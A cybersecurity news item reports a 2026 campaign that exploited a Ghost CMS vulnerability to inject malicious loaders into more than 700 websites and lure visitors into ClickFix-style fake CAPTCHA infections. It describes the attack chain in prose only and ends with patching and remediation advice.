A critical vulnerability in Ghost CMS, identified as CVE-2026-26980, has been exploited by attackers in a large-scale malware campaign. Security researchers confirmed that more than 700 websites were compromised during the attacks. The flaw received a high severity score of 9.4 because of the serious risks it created. Many of the targeted websites were running outdated and vulnerable versions of Ghost CMS.

Researchers from QiAnXin XLab said the attackers managed to gain unauthorized access through Ghost’s Content API. After entering the systems, they stole Admin API keys and injected malicious JavaScript code into webpages. This allowed legitimate websites to silently spread malware to visitors without the owners noticing. The vulnerability was later fixed in Ghost version 6.19.1 earlier this year.

The malicious code added to websites worked as a hidden JavaScript loader placed at the bottom of webpages. Once a visitor opened the infected page, the script contacted remote attacker-controlled servers. Additional payloads were then downloaded dynamically during runtime to continue the infection process. Researchers said this method allowed attackers to change malware remotely without modifying the websites again.

Security experts also found that the campaign used cloaking techniques through a traffic-filtering service called Adspect. The system collected browser fingerprint details to decide whether a visitor should see the malware. Some users were shown harmless pages while selected targets were redirected elsewhere. This made the campaign more difficult for researchers and security tools to detect properly.

Victims chosen by the attackers were redirected to fake CAPTCHA verification pages designed to look trustworthy. These pages instructed users to copy and paste a Base64-encoded command into the Windows Run dialog box. This social engineering technique is commonly linked with ClickFix attacks seen in recent months. Once the command was executed, malware files were automatically downloaded onto the victim’s computer.

The downloaded ZIP archives contained batch scripts and PowerShell commands that installed more malicious components. In some cases, attackers used DLL files launched through rundll32.exe to continue the attack chain. Other versions of the campaign delivered JavaScript-based payloads instead of DLL malware files. The malware also maintained communication with attacker-controlled servers every 30 seconds after infection.

Researchers additionally discovered that one payload used a modified version of the open-source Grape desktop client. This gave attackers the ability to remotely execute JavaScript code and launch executable files on infected systems. The campaign affected websites belonging to universities, AI platforms, fintech companies, SaaS providers, blockchain services, and media organizations. Because trusted websites were compromised, users were more likely to trust the fake CAPTCHA pages.

Security experts are now urging Ghost CMS administrators to immediately update their systems to the latest patched version. They also advised organizations to rotate API keys, remove injected scripts, and review access logs carefully. Researchers said the malicious activity was first detected on May 7, 2026, and may involve at least two threat groups. The incident highlights how dangerous CMS vulnerabilities can become when attackers exploit trusted websites to spread malware.

Stay alert, and keep your security measures updated!

Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news